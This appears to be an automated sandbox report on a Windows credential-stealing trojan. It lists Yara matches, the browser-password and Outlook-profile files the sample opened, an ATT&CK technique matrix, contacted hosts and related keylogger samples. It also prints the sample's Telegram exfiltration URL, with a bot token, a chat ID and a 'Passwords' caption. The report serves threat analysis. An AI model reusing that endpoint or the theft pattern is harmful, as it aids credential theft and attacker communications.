                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JWPRnfqs3n.exe PID: 2444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2172, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JWPRnfqs3n.exe PID: 2444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2172, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: JWPRnfqs3n.exeBinary or memory string: WIN_81
                Source: JWPRnfqs3n.exeBinary or memory string: WIN_XP
                Source: JWPRnfqs3n.exeBinary or memory string: WIN_XPe
                Source: JWPRnfqs3n.exeBinary or memory string: WIN_VISTA
                Source: JWPRnfqs3n.exeBinary or memory string: WIN_7
                Source: JWPRnfqs3n.exeBinary or memory string: WIN_8
                Source: JWPRnfqs3n.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JWPRnfqs3n.exe PID: 2444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2172, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JWPRnfqs3n.exe PID: 2444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2172, type: MEMORYSTR
                Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.JWPRnfqs3n.exe.d80000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: JWPRnfqs3n.exe PID: 2444, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2172, type: MEMORYSTR
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00876283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00876283
                Source: C:\Users\user\Desktop\JWPRnfqs3n.exeCode function: 5_2_00876747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00876747
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                2
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                1
                Web Service
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                2
                Valid Accounts
                1
                DLL Side-Loading
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                2
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                3
                Obfuscated Files or Information
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                DLL Side-Loading
                NTDS127
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                3
                Non-Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                2
                Valid Accounts
                LSA Secrets131
                Security Software Discovery
                SSH3
                Clipboard Data
                14
                Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                Virtualization/Sandbox Evasion
                Cached Domain Credentials11
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                Access Token Manipulation
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                Process Injection
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                JWPRnfqs3n.exe79%ReversingLabsWin32.Trojan.AutoItinject
                JWPRnfqs3n.exe67%VirustotalBrowse
                JWPRnfqs3n.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                reallyfreegeoip.org
                104.21.80.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.247.73
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendDocument?chat_id=7455776561&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.telegram.org/bot8138619732:AAH290KzTAyIxOODoUHLupo_iFgT4CfKzAM/sendDocument?chat_id=7455RegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://api.telegram.orgRegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.org/botRegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://checkip.dyndns.org/qJWPRnfqs3n.exe, 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpfalse
                                      high
                                      http://reallyfreegeoip.orgRegSvcs.exe, 00000008.00000002.3730877202.0000000002742000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://reallyfreegeoip.orgRegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://checkip.dyndns.orgRegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.0000000002714000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://checkip.dyndns.comRegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://api.telegram.orgRegSvcs.exe, 00000008.00000002.3730877202.00000000027FB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000008.00000002.3730877202.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot-/sendDocument?chat_id=JWPRnfqs3n.exe, 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpfalse
                                                    high
                                                    https://reallyfreegeoip.org/xml/JWPRnfqs3n.exe, 00000005.00000002.1332934469.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3730877202.0000000002720000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3729360682.0000000000372000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      149.154.167.220
                                                      api.telegram.orgUnited Kingdom
                                                      62041TELEGRAMRUfalse
                                                      104.21.80.1
                                                      reallyfreegeoip.orgUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      132.226.247.73
                                                      checkip.dyndns.comUnited States
                                                      16989UTMEMUSfalse
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1588982
                                                      Start date and time:2025-01-11 07:58:10 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 8m 25s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:14
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:0
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:JWPRnfqs3n.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:278d8f1d42cc9c240dcaee341104615fda13571ca36748ce099ebf7740875905.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@3/2@3/3
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 54
                                                      • Number of non-executed functions: 274
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200, 20.109.210.53
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                      TimeTypeDescription
                                                      01:59:19API Interceptor9272539x Sleep call for process: RegSvcs.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      149.154.167.220c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                        ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                            14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                              Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                  sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                        4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          104.21.80.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                          • www.aziziyeescortg.xyz/2pcx/
                                                                          qlG7x91YXH.exeGet hashmaliciousFormBookBrowse
                                                                          • www.mzkd6gp5.top/0hqe/
                                                                          6uHfmjGMfL.exeGet hashmaliciousAmadeyBrowse
                                                                          • clientservices.sgoogleapis.observer/api/index.php
                                                                          http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8XGet hashmaliciousUnknownBrowse
                                                                          • my.cradaygo.com/smmylet
                                                                          SW_48912.scr.exeGet hashmaliciousFormBookBrowse
                                                                          • www.dejikenkyu.cyou/pmpa/
                                                                          SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                          • hiranetwork.com/administrator/index.php
                                                                          downloader2.htaGet hashmaliciousXWormBrowse
                                                                          • 2k8u3.org/wininit.exe
                                                                          132.226.247.7314lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • checkip.dyndns.org/
                                                                          Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • checkip.dyndns.org/
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          checkip.dyndns.comc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 132.226.8.169
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 193.122.130.0
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 193.122.6.168
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 132.226.247.73
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 193.122.130.0
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 193.122.6.168
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 158.101.44.242
                                                                          3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 158.101.44.242
                                                                          lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 158.101.44.242
                                                                          reallyfreegeoip.orgc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.80.1
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.96.1
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.32.1
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.64.1
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.32.1
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.64.1
                                                                          3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.112.1
                                                                          api.telegram.orgc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          TELEGRAMRUc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          CLOUDFLARENETUSxNuh0DUJaG.exeGet hashmaliciousLummaCBrowse
                                                                          • 104.21.80.1
                                                                          c7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.80.1
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.16.1
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.96.1
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.32.1
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.64.1
                                                                          fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                                          • 104.21.112.1
                                                                          JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 172.67.74.152
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.32.1
                                                                          UTMEMUSc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 132.226.8.169
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 132.226.247.73
                                                                          rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 132.226.247.73
                                                                          wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 132.226.247.73
                                                                          tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 132.226.247.73
                                                                          MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 132.226.8.169
                                                                          fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 132.226.8.169
                                                                          4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 132.226.8.169
                                                                          uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 132.226.8.169
                                                                          4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 132.226.247.73
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          54328bd36c14bd82ddaa0c04b25ed9adc7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          b6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                          • 104.21.80.1
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.80.1
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.80.1
                                                                          3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 104.21.80.1
                                                                          lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 104.21.80.1
                                                                          3b5074b1b5d032e5620f69f9f700ff0ec7WJL1gt32.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                          • 149.154.167.220
                                                                          JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                          • 149.154.167.220
                                                                          ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
                                                                          lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          • 149.154.167.220
